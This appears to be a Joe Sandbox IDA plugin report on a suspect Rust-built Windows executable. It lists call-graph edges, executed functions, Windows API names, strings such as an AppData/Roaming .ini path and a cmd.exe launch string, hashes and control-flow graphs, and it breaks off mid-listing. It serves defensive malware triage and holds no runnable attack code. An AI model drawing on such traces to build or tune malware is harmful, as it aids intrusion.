124339->124543 124340->124347 124544 7ff79e941530 98 API calls 124340->124544 124355 7ff79e94ef7e CloseHandle 124341->124355 124342->124341 124351 7ff79e94ee4c 124343->124351 124352 7ff79e94ee40 CloseHandle 124343->124352 124344->124343 124345->124355 124346 7ff79e939670 98 API calls 124367 7ff79e94e1d9 124346->124367 124349 7ff79e94f041 WakeByAddressSingle 124347->124349 124347->124372 124349->124372 124350 7ff79e948dd0 98 API calls 124350->124367 124542 7ff79e907710 98 API calls 124351->124542 124352->124351 124353 7ff79e94d529 memcpy 124357 7ff79e94d54f 124353->124357 124379 7ff79e94d55b 124353->124379 124354->124353 124354->124372 124529 7ff79e917020 98 API calls 124354->124529 124355->124330 124356 7ff79e94e74d 124537 7ff79e906fd0 100 API calls 124356->124537 124365 7ff79e917950 2 API calls 124357->124365 124363 7ff79e94fa90 111 API calls 124363->124367 124364 7ff79e94d514 124364->124353 124365->124379 124366 7ff79e94d603 124366->124265 124368 7ff79e917950 2 API calls 124366->124368 124367->124346 124367->124350 124367->124363 124367->124372 124534 7ff79e93a360 101 API calls 124367->124534 124368->124265 124369 7ff79e9209f0 98 API calls 124369->124371 124370 7ff79e917950 GetProcessHeap HeapAlloc 124370->124379 124371->124306 124371->124334 124371->124356 124371->124369 124375 7ff79e917950 GetProcessHeap HeapAlloc 124371->124375 124535 7ff79e913a70 100 API calls 124371->124535 124536 7ff79e917020 98 API calls 124371->124536 124372->124236 124502 7ff79e906fd0 100 API calls 124372->124502 124373 7ff79e942e70 98 API calls 124373->124379 124374 7ff79e94ee58 124374->124236 124375->124371 124377 7ff79e94da99 124380 7ff79e917950 2 API calls 124377->124380 124378 7ff79e917020 98 API calls 124378->124379 124379->124366 124379->124370 124379->124372 124379->124373 124379->124377 124379->124378 124530 7ff79e99c1a0 98 API calls 124379->124530 124381 7ff79e94daa5 124380->124381 124381->123756 124577 7ff79e94a7a0 124382->124577 124385 7ff79e94a4d7 124388 7ff79e94a7a0 101 API calls 124385->124388 124386 7ff79e94a4ca CloseHandle 124387 7ff79e93c505 124386->124387 124387->123765 124387->123777 124393 7ff79e94a4fe 124388->124393 124389 7ff79e94a6ec 124390 7ff79e9086c0 103 API calls 124389->124390 124390->124387 124391 7ff79e94a675 GetLastError 124399 7ff79e94a630 124391->124399 124392 7ff79e94a5d4 GetOverlappedResult 124392->124393 124394 7ff79e94a686 GetLastError 124392->124394 124393->124389 124393->124391 124393->124392 124396 7ff79e94a589 GetOverlappedResult 124393->124396 124397 7ff79e94a880 98 API calls 124393->124397 124393->124399 124394->124399 124396->124393 124398 7ff79e94a708 GetLastError 124396->124398 124397->124393 124398->124399 124589 7ff79e9086c0 124399->124589 124401->123774 124402->123771 124407 7ff79e942ec0 124405->124407 124406 7ff79e9432b2 124406->124253 124407->124406 124408 7ff79e917950 2 API calls 124407->124408 124409 7ff79e942f94 124407->124409 124408->124409 124410 7ff79e94320a 124409->124410 124411 7ff79e917950 2 API calls 124409->124411 124412 7ff79e9432da 124409->124412 124562 7ff79e917020 98 API calls 124409->124562 124410->124406 124413 7ff79e943226 124410->124413 124563 7ff79e917020 98 API calls 124410->124563 124411->124409 124564 7ff79e987210 98 API calls 124412->124564 124413->124406 124418 7ff79e917950 2 API calls 124413->124418 124418->124406 124420 7ff79e9490c0 124419->124420 124423 7ff79e949094 124419->124423 124420->124423 124421 7ff79e949117 SetLastError GetModuleFileNameW 124421->124423 124424 7ff79e949132 GetLastError 124421->124424 124423->124420 124423->124421 124426 7ff79e94914b GetLastError 124423->124426 124429 7ff79e94917d 124423->124429 124565 7ff79e917020 98 API calls 124423->124565 124424->124423 124425 7ff79e9491e7 GetLastError 124424->124425 124427 7ff79e949195 124425->124427 124426->124423 124428 7ff79e94921a 124426->124428 124427->124171 124566 7ff79e987290 98 API calls 124428->124566 124431 7ff79e949234 124429->124431 124432 7ff79e949186 124429->124432 124567 7ff79e98d4c0 98 API calls 124431->124567 124434 7ff79e9375f0 98 API calls 124432->124434 124434->124427 124568 7ff79e953aa0 98 API calls 124444->124568 124446 7ff79e93a987 124448 7ff79e937617 124447->124448 124457 7ff79e937643 124447->124457 124449 7ff79e937883 124448->124449 124450 7ff79e8f3e00 2 API calls 124448->124450 124570 7ff79e97a450 98 API calls 124449->124570 124451 7ff79e93763a 124450->124451 124451->124449 124451->124457 124453 7ff79e93785f 124463 7ff79e939670 124453->124463 124457->124453 124460 7ff79e937670 memcpy 124457->124460 124569 7ff79e916ed0 98 API calls 124457->124569 124460->124457 124464 7ff79e9396a5 124463->124464 124571 7ff79e953aa0 98 API calls 124464->124571 124466 7ff79e9396d0 124468 7ff79e951a40 98 API calls 124467->124468 124469 7ff79e94fab7 124468->124469 124470 7ff79e943310 111 API calls 124469->124470 124471 7ff79e94fac4 124469->124471 124470->124471 124471->124317 124473 7ff79e951a40 98 API calls 124472->124473 124477 7ff79e929c71 124473->124477 124474 7ff79e929d68 SetLastError GetEnvironmentVariableW 124476 7ff79e929d88 GetLastError 124474->124476 124474->124477 124476->124477 124478 7ff79e929e60 GetLastError 124476->124478 124477->124474 124479 7ff79e929da1 GetLastError 124477->124479 124481 7ff79e929dd3 124477->124481 124487 7ff79e929c7a 124477->124487 124572 7ff79e917020 98 API calls 124477->124572 124478->124487 124479->124477 124480 7ff79e929ef7 124479->124480 124573 7ff79e987290 98 API calls 124480->124573 124482 7ff79e929ddc 124481->124482 124483 7ff79e929f11 124481->124483 124485 7ff79e9375f0 98 API calls 124482->124485 124574 7ff79e98d4c0 98 API calls 124483->124574 124485->124487 124487->124367 124493->124140 124494->124140 124495->124140 124496->124148 124497->124148 124498->124148 124499->124153 124500->124162 124502->124236 124504 7ff79e94332a 124503->124504 124505 7ff79e94333f 124503->124505 124504->124181 124506 7ff79e94335b 124505->124506 124509 7ff79e9433b2 124505->124509 124510 7ff79e94339a 124505->124510 124507 7ff79e953f30 98 API calls 124506->124507 124508 7ff79e943377 124507->124508 124508->124181 124509->124506 124513 7ff79e9433f1 124509->124513 124575 7ff79e951c00 105 API calls 124510->124575 124512 7ff79e9433ab 124512->124181 124576 7ff79e952020 104 API calls 124513->124576 124515 7ff79e943407 124515->124181 124517->124181 124518->124213 124519->124278 124520->124318 124525 7ff79e948e2c 124521->124525 124522 7ff79e948f7c 124523 7ff79e948f90 124522->124523 124524 7ff79e9375f0 98 API calls 124522->124524 124523->124221 124524->124523 124525->124522 124526 7ff79e917950 2 API calls 124525->124526 124526->124525 124527->124221 124528->124323 124529->124364 124530->124379 124531->124215 124532->124277 124533->124309 124534->124367 124535->124371 124536->124371 124537->124372 124538->124314 124539->124304 124540->124323 124541->124335 124542->124374 124543->124347 124544->124347 124562->124409 124563->124413 124565->124423 124568->124446 124569->124457 124571->124466 124572->124477 124575->124512 124576->124515 124578 7ff79e94a7cd 124577->124578 124579 7ff79e94a827 GetLastError 124578->124579 124580 7ff79e94a7d2 124578->124580 124583 7ff79e94a851 124579->124583 124581 7ff79e8f3e00 2 API calls 124580->124581 124582 7ff79e94a7ee 124581->124582 124582->124583 124584 7ff79e94a4bc 124582->124584 124592 7ff79e97a470 98 API calls 124583->124592 124584->124385 124584->124386 124586 7ff79e94a860 CloseHandle CloseHandle 124593 7ff79e99d100 6 API calls 124586->124593 124588 7ff79e94a87d 124594 7ff79e94aae0 124589->124594 124591 7ff79e9086d4 CloseHandle CloseHandle 124592->124586 124593->124588 124595 7ff79e94aaf6 124594->124595 124600 7ff79e94ab2a 124594->124600 124596 7ff79e94ab09 GetOverlappedResult 124595->124596 124597 7ff79e94ab32 GetLastError 124595->124597 124598 7ff79e94aba0 GetLastError 124596->124598 124596->124600 124599 7ff79e94ab47 124597->124599 124598->124599 124598->124600 124599->124600 124601 7ff79e8f3e00 2 API calls 124599->124601 124600->124591 124602 7ff79e94ab87 124601->124602 124602->124600 124607 7ff79e97a470 98 API calls 124602->124607 124604 7ff79e94ac1f 124608 7ff79e99d100 6 API calls 124604->124608 124606 7ff79e94ac42 124607->124604 124608->124606 124613 7ff79e8f215d memcpy 124612->124613 124614 7ff79e8f217b 124612->124614 124613->123820 124618 7ff79e8f74eb 124614->124618 124619 7ff79e8f744b 2 API calls 124618->124619 124621 7ff79e8f74f4 124619->124621 124620 7ff79e8f2186 124620->124613 124621->124620 124624 7ff79e97a450 98 API calls 124621->124624 124626 7ff79e8f1464 124625->124626 124627 7ff79e8f1459 124625->124627 124630 7ff79e98d4c0 98 API calls 124626->124630 124627->123829 124635 7ff79e8f13d0 124638 7ff79e8f1180 124635->124638 124637 7ff79e8f13e6 124639 7ff79e8f11b0 124638->124639 124640 7ff79e8f11b9 Sleep 124639->124640 124641 7ff79e8f11c9 124639->124641 124640->124639 124642 7ff79e8f134c _initterm 124641->124642 124643 7ff79e8f11fc 124641->124643 124650 7ff79e8f12b2 124641->124650 124642->124643 124651 7ff79e99d980 124643->124651 124645 7ff79e8f1224 SetUnhandledExceptionFilter 124646 7ff79e8f1247 124645->124646 124647 7ff79e8f124c malloc 124646->124647 124648 7ff79e8f1276 124647->124648 124647->124650 124649 7ff79e8f1280 strlen malloc memcpy 124648->124649 124649->124649 124649->124650 124650->124637 124653 7ff79e99d9b8 124651->124653 124675 7ff79e99d9a1 124651->124675 124652 7ff79e99dc80 124654 7ff79e99dc89 124652->124654 124652->124675 124653->124652 124655 7ff79e99da30 124653->124655 124659 7ff79e99db90 124653->124659 124653->124675 124665 7ff79e99dcad 124654->124665 124678 7ff79e99d810 8 API calls 124654->124678 124656 7ff79e99dcd6 124655->124656 124655->124659 124661 7ff79e99dcc0 124655->124661 124664 7ff79e99dbf0 124655->124664 124655->124665 124671 7ff79e99daa2 124655->124671 124655->124675 124681 7ff79e99d7a0 8 API calls 124656->124681 124660 7ff79e99dbd0 124659->124660 124659->124661 124660->124661 124676 7ff79e99d810 8 API calls 124660->124676 124680 7ff79e99d7a0 8 API calls 124661->124680 124664->124661 124666 7ff79e99dbe2 124664->124666 124679 7ff79e99d7a0 8 API calls 124665->124679 124666->124661 124666->124664 124677 7ff79e99d810 8 API calls 124666->124677 124667 7ff79e99dce2 124667->124645 124670 7ff79e99d810 8 API calls 124670->124671 124671->124655 124671->124661 124671->124670 124672 7ff79e99db1d 124671->124672 124673 7ff79e99db20 124671->124673 124672->124673 124674 7ff79e99db52 VirtualProtect 124673->124674 124673->124675 124674->124673 124675->124645 124676->124666 124677->124666 124678->124654 124679->124661 124680->124656 124681->124667 124682 7ff79e94fc75 124687 7ff79e9494d0 124682->124687 124684 7ff79e94fc87 124685 7ff79e94fc96 124684->124685 124686 7ff79e94fdd3 CloseHandle 124684->124686 124686->124685 124688 7ff79e949520 GetCurrentProcessId 124687->124688 124692 7ff79e949534 124688->124692 124689 7ff79e949540 ProcessPrng 124689->124689 124689->124692 124690 7ff79e97b9b0 104 API calls 124690->124692 124691 7ff79e8f3e00 2 API calls 124691->124692 124692->124688 124692->124689 124692->124690 124692->124691 124693 7ff79e949bed 124692->124693 124699 7ff79e9499e9 GetLastError 124692->124699 124700 7ff79e949aff 124692->124700 124704 7ff79e916e30 2 API calls 124692->124704 124706 7ff79e949a8f 124692->124706 124708 7ff79e9497c0 124692->124708 124710 7ff79e97a450 98 API calls 124693->124710 124699->124692 124699->124706 124703 7ff79e943750 98 API calls 124700->124703 124703->124706 124704->124692 124705 7ff79e949ae4 124705->124684 124706->124705 124707 7ff79e949adc CloseHandle 124706->124707 124707->124705 124709 7ff79e97a450 98 API calls 124708->124709 124711 7ff79e94fc10 124712 7ff79e943750 98 API calls 124711->124712 124713 7ff79e94fc6d 124712->124713

                                                                                                        Executed Functions

                                                                                                        Function 00007FF79E94B630 Relevance: 113.7, APIs: 51, Strings: 12, Instructions: 3418COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$EnvironmentErrorFreeLastStringsmemcpy
                                                                                                        • String ID: program path has no file name$#$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "$.exeprogram not found$0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards$PATHlibrary\std\src\sys_common\process.rs$\?\\$\cmd.exemaximum number of ProcThreadAttributes exceeded$]?\\$assertion failed: is_code_point_boundary(self, new_len)$assertion failed: self.height > 0$exe\\.\NULexit code:
                                                                                                        • API String ID: 3975177916-99999070
                                                                                                        • Opcode ID: 707f7174a3a5a736f48f9c33765ae7d703ce31fd583a4294475e088c7f01029f
                                                                                                        • Instruction ID: a711dccf80e91178061bb0f0b9ae28cbf9d64133b9fd0518b4d13c2a4a83707a
                                                                                                        • Opcode Fuzzy Hash: 707f7174a3a5a736f48f9c33765ae7d703ce31fd583a4294475e088c7f01029f
                                                                                                        • Instruction Fuzzy Hash: 3073B662A19AD288EB70AF35DC903FDA3A1FB45798F805135DE0D5BB95EF3892418331
                                                                                                        Function 00007FF79E8F2FE9 Relevance: 13.0, APIs: 3, Strings: 4, Instructions: 741synchronizationCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1141 7ff79e8f2fe9-7ff79e8f3008 1142 7ff79e8f300a-7ff79e8f3025 call 7ff79e8f1893 1141->1142 1143 7ff79e8f3027 1141->1143 1145 7ff79e8f3029-7ff79e8f302c 1142->1145 1143->1145 1146 7ff79e8f305a-7ff79e8f30a4 call 7ff79e98d530 call 7ff79e97aed0 1143->1146 1148 7ff79e8f3045-7ff79e8f3055 call 7ff79e98d4c0 1145->1148 1149 7ff79e8f302e-7ff79e8f3044 1145->1149 1155 7ff79e8f3c95-7ff79e8f3cca call 7ff79e9877f0 1146->1155 1156 7ff79e8f30aa-7ff79e8f30d7 CreateMutexA GetLastError 1146->1156 1148->1146 1162 7ff79e8f3ccf-7ff79e8f3cdd call 7ff79e987030 1155->1162 1157 7ff79e8f30fb-7ff79e8f310e call 7ff79e8f3e48 1156->1157 1158 7ff79e8f30d9-7ff79e8f30fa call 7ff79e8f1db9 1156->1158 1157->1162 1166 7ff79e8f3114-7ff79e8f3174 call 7ff79e8f74eb 1157->1166 1167 7ff79e8f3ce2-7ff79e8f3d12 call 7ff79e987210 1162->1167 1173 7ff79e8f317b-7ff79e8f31c4 call 7ff79e93e190 call 7ff79e93e1c0 call 7ff79e8f1f75 call 7ff79e8f21bf 1166->1173 1171 7ff79e8f3d17-7ff79e8f3d41 call 7ff79e9877f0 1167->1171 1174 7ff79e8f3d46-7ff79e8f3d59 call 7ff79e987290 1171->1174 1187 7ff79e8f31c6-7ff79e8f32d3 call 7ff79e952e90 call 7ff79e93b8e0 call 7ff79e952e90 call 7ff79e8f20ea call 7ff79e93b8e0 call 7ff79e8f1d8d * 2 call 7ff79e8f1fb8 1173->1187 1179 7ff79e8f3d5e-7ff79e8f3d6a call 7ff79e987010 1174->1179 1204 7ff79e8f32da-7ff79e8f32dd 1187->1204 1205 7ff79e8f32df-7ff79e8f32f6 1204->1205 1206 7ff79e8f32f8-7ff79e8f331f call 7ff79e8fd80b 1204->1206 1205->1204 1209 7ff79e8f3321-7ff79e8f333d call 7ff79e8f3f4c 1206->1209 1210 7ff79e8f3389-7ff79e8f33d1 call 7ff79e8fcbfc call 7ff79e8f241a 1206->1210 1209->1210 1216 7ff79e8f333f-7ff79e8f334c 1209->1216 1222 7ff79e8f3416-7ff79e8f3459 call 7ff79e8fcc30 1210->1222 1223 7ff79e8f33d3-7ff79e8f33e5 call 7ff79e8f15d5 1210->1223 1217 7ff79e8f334e-7ff79e8f335f call 7ff79e8f3e20 1216->1217 1218 7ff79e8f336c-7ff79e8f3374 call 7ff79e8f22a2 1216->1218 1229 7ff79e8f3361-7ff79e8f3367 call 7ff79e97a450 1217->1229 1230 7ff79e8f3379-7ff79e8f3381 1217->1230 1218->1230 1235 7ff79e8f345e-7ff79e8f3460 1222->1235 1232 7ff79e8f3462-7ff79e8f3467 1223->1232 1233 7ff79e8f33e7-7ff79e8f3414 call 7ff79e8f19cd 1223->1233 1229->1218 1230->1210 1237 7ff79e8f346a-7ff79e8f34c2 call 7ff79e8fcfbf call 7ff79e8fc6f1 1232->1237 1233->1235 1235->1237 1243 7ff79e8f34c4-7ff79e8f34cc call 7ff79e8f1dc4 1237->1243 1244 7ff79e8f34d1-7ff79e8f3534 call 7ff79e8f1496 1237->1244 1243->1244 1248 7ff79e8f3536-7ff79e8f3541 call 7ff79e8f19cd 1244->1248 1249 7ff79e8f35b0-7ff79e8f35b8 1244->1249 1253 7ff79e8f3546-7ff79e8f3572 call 7ff79e8f1d8d call 7ff79e8f1de7 call 7ff79e8f1e41 call 7ff79e8f1d7a 1248->1253 1251 7ff79e8f35be-7ff79e8f35d6 1249->1251 1252 7ff79e8f3739-7ff79e8f373c 1249->1252 1254 7ff79e8f35d8-7ff79e8f35e3 1251->1254 1252->1253 1255 7ff79e8f3742-7ff79e8f3762 call 7ff79e952e90 call 7ff79e92bbf0 1252->1255 1296 7ff79e8f3577-7ff79e8f35ab call 7ff79e8f1d8d * 4 1253->1296 1258 7ff79e8f35e5-7ff79e8f35fd call 7ff79e8f1496 1254->1258 1259 7ff79e8f3616-7ff79e8f3619 1254->1259 1255->1171 1277 7ff79e8f3768-7ff79e8f37c6 call 7ff79e8f1d8d call 7ff79e8f1de7 call 7ff79e8f1e41 call 7ff79e8f1d7a call 7ff79e8f1d8d 1255->1277 1258->1248 1274 7ff79e8f3603-7ff79e8f360b 1258->1274 1263 7ff79e8f3641-7ff79e8f3654 1259->1263 1264 7ff79e8f361b-7ff79e8f3629 call 7ff79e8f5d25 1259->1264 1266 7ff79e8f3658-7ff79e8f3684 memset call 7ff79e8f296e 1263->1266 1270 7ff79e8f362e-7ff79e8f3631 1264->1270 1284 7ff79e8f3686-7ff79e8f3689 1266->1284 1285 7ff79e8f36df-7ff79e8f36e2 1266->1285 1275 7ff79e8f3c85-7ff79e8f3c90 call 7ff79e92e130 1270->1275 1276 7ff79e8f3637-7ff79e8f363c 1270->1276 1280 7ff79e8f3611 1274->1280 1281 7ff79e8f3732 1274->1281 1275->1248 1276->1263 1318 7ff79e8f37cd-7ff79e8f37d1 1277->1318 1280->1259 1281->1252 1289 7ff79e8f368f-7ff79e8f36c1 call 7ff79e8f1573 1284->1289 1290 7ff79e8f372d 1284->1290 1285->1174 1291 7ff79e8f36e8-7ff79e8f36eb 1285->1291 1289->1248 1310 7ff79e8f36c7-7ff79e8f36da call 7ff79e8f19cd 1289->1310 1290->1281 1291->1290 1295 7ff79e8f36ed-7ff79e8f3728 1291->1295 1295->1254 1310->1266 1319 7ff79e8f388c-7ff79e8f39a8 call 7ff79e8f20ea call 7ff79e952e90 call 7ff79e8f20ea call 7ff79e8f28f5 1318->1319 1320 7ff79e8f37d7-7ff79e8f37de 1318->1320 1351 7ff79e8f39b2-7ff79e8f39b6 1319->1351 1321 7ff79e8f37e0-7ff79e8f37e5 1320->1321 1322 7ff79e8f37e7-7ff79e8f37f9 1320->1322 1324 7ff79e8f3841-7ff79e8f3844 1321->1324 1325 7ff79e8f37fb-7ff79e8f380e 1322->1325 1326 7ff79e8f382c-7ff79e8f3836 1322->1326 1330 7ff79e8f3846-7ff79e8f3849 1324->1330 1331 7ff79e8f3860-7ff79e8f3862 1324->1331 1328 7ff79e8f3810-7ff79e8f382a 1325->1328 1329 7ff79e8f3838-7ff79e8f383f 1325->1329 1326->1324 1328->1324 1329->1324 1333 7ff79e8f386f 1330->1333 1334 7ff79e8f384b-7ff79e8f384e 1330->1334 1336 7ff79e8f3871-7ff79e8f387c call 7ff79e8f21bf 1331->1336 1333->1336 1338 7ff79e8f3864 call 7ff79e8f3d6b 1334->1338 1339 7ff79e8f3850-7ff79e8f3853 1334->1339 1336->1318 1346 7ff79e8f3869-7ff79e8f386d 1338->1346 1343 7ff79e8f3855-7ff79e8f385e call 7ff79e8f3d6b 1339->1343 1344 7ff79e8f3881-7ff79e8f3886 1339->1344 1343->1346 1344->1167 1344->1319 1346->1336 1352 7ff79e8f39d6-7ff79e8f3a5f call 7ff79e94b1e0 call 7ff79e94b300 call 7ff79e93c410 call 7ff79e8f1f14 call 7ff79e8f1a31 1351->1352 1353 7ff79e8f39b8-7ff79e8f39d4 1351->1353 1364 7ff79e8f3a65-7ff79e8f3aa7 call 7ff79e8f2940 1352->1364 1365 7ff79e8f3c59-7ff79e8f3c80 call 7ff79e8f19af call 7ff79e8f1d8d * 2 1352->1365 1353->1351 1370 7ff79e8f3ab1-7ff79e8f3ab5 1364->1370 1365->1296 1372 7ff79e8f3ad5-7ff79e8f3b7f call 7ff79e94b1e0 call 7ff79e8f291a call 7ff79e94b300 call 7ff79e8f28d5 1370->1372 1373 7ff79e8f3ab7-7ff79e8f3ad3 1370->1373 1385 7ff79e8f3b89-7ff79e8f3b8d 1372->1385 1373->1370 1386 7ff79e8f3b8f-7ff79e8f3ba8 1385->1386 1387 7ff79e8f3baa-7ff79e8f3bfc call 7ff79e94b300 call 7ff79e952e90 call 7ff79e92b7a0 1385->1387 1386->1385 1387->1179 1394 7ff79e8f3c02-7ff79e8f3c25 call 7ff79e94b300 call 7ff79e93c410 1387->1394 1398 7ff79e8f3c2a-7ff79e8f3c57 call 7ff79e8f1f14 call 7ff79e8f1a31 call 7ff79e8f19af 1394->1398 1398->1365
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • 0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character, xrefs: 00007FF79E8F37C6
                                                                                                        • assertion failed: filled <= self.buf.init/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\core\src\io\borrowed_buf.rs, xrefs: 00007FF79E8F3D46
                                                                                                        • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards, xrefs: 00007FF79E8F3174
                                                                                                        • AppData/Roaming/.ini, xrefs: 00007FF79E8F31FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateErrorLastMutexmemcpy
                                                                                                        • String ID: 0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards$AppData/Roaming/.ini$assertion failed: filled <= self.buf.init/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\core\src\io\borrowed_buf.rs
                                                                                                        • API String ID: 2779520464-1460878906
                                                                                                        • Opcode ID: 3c6cfbedc275e337f7816d3378005c7c24f24012d75e5ed0f3664ddbd6614d12
                                                                                                        • Instruction ID: ca25b1a9a5114df87b1ffe8d09381b93712fbf2370ec14462307ee0b15de1685
                                                                                                        • Opcode Fuzzy Hash: 3c6cfbedc275e337f7816d3378005c7c24f24012d75e5ed0f3664ddbd6614d12
                                                                                                        • Instruction Fuzzy Hash: 2672B132A18B8281EA31EB61E4917FEA360FB94790FC05532DA8D17B96DF3CD165C760
                                                                                                        Function 00007FF79E8F1180 Relevance: 10.6, APIs: 7, Instructions: 137sleepstringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: malloc$ExceptionFilterSleepUnhandledmemcpystrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3806033187-0
                                                                                                        • Opcode ID: 185179c1d74cf54bdcd9faed2df6e4b5ea4683eb18480226f85787322097f7df
                                                                                                        • Instruction ID: 445180e93ed24782279a1e4429e5a93e90fbe8d6be23817907749e18c19ca7f1
                                                                                                        • Opcode Fuzzy Hash: 185179c1d74cf54bdcd9faed2df6e4b5ea4683eb18480226f85787322097f7df
                                                                                                        • Instruction Fuzzy Hash: DF514635A0960289F730BB75E8C1A79A3A5AF54BD0F845431C94D477A6DE2CF8808371
                                                                                                        Function 00007FF79E9494D0 Relevance: 8.0, APIs: 5, Instructions: 464COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1502 7ff79e9494d0-7ff79e94951e 1503 7ff79e949520-7ff79e949532 GetCurrentProcessId 1502->1503 1504 7ff79e949568-7ff79e9495e2 call 7ff79e97b9b0 1503->1504 1505 7ff79e949534 1503->1505 1509 7ff79e9495f9-7ff79e949623 1504->1509 1510 7ff79e9495e4-7ff79e9495f4 call 7ff79e8f3e10 1504->1510 1506 7ff79e949540-7ff79e949566 ProcessPrng 1505->1506 1506->1504 1506->1506 1512 7ff79e949625-7ff79e94962b 1509->1512 1513 7ff79e949640-7ff79e949659 1509->1513 1510->1509 1514 7ff79e94962d-7ff79e949633 1512->1514 1515 7ff79e949660-7ff79e94966f 1512->1515 1516 7ff79e94970d-7ff79e94972d call 7ff79e8f3e00 1513->1516 1518 7ff79e9496b5-7ff79e9496ba 1514->1518 1519 7ff79e9496ac-7ff79e9496b3 1515->1519 1520 7ff79e949671-7ff79e949680 1515->1520 1529 7ff79e949733-7ff79e94974f 1516->1529 1530 7ff79e949bf0-7ff79e949bfd call 7ff79e97a450 1516->1530 1523 7ff79e9496bd-7ff79e9496fc 1518->1523 1519->1518 1521 7ff79e949686-7ff79e9496a5 1520->1521 1522 7ff79e949a50-7ff79e949a5f 1520->1522 1521->1518 1525 7ff79e9496a7 1521->1525 1522->1518 1528 7ff79e949a65-7ff79e949a8a 1522->1528 1526 7ff79e949bed 1523->1526 1527 7ff79e949702-7ff79e949709 1523->1527 1525->1528 1526->1530 1527->1516 1528->1523 1532 7ff79e949774-7ff79e949777 1529->1532 1533 7ff79e949c02-7ff79e949c0a 1530->1533 1534 7ff79e94977d-7ff79e949781 1532->1534 1535 7ff79e949800-7ff79e949805 1532->1535 1536 7ff79e949c0c-7ff79e949c40 1533->1536 1537 7ff79e949c5d-7ff79e949c66 call 7ff79e99d100 1533->1537 1540 7ff79e949783-7ff79e949788 1534->1540 1541 7ff79e9497d0-7ff79e9497d4 1534->1541 1538 7ff79e94980b-7ff79e949813 1535->1538 1539 7ff79e9499a0-7ff79e9499e3 call 7ff79e99cbdc 1535->1539 1558 7ff79e949c50-7ff79e949c53 1536->1558 1559 7ff79e949c42-7ff79e949c4b call 7ff79e8f3e10 1536->1559 1545 7ff79e949815-7ff79e94982b 1538->1545 1546 7ff79e949890-7ff79e949899 1538->1546 1566 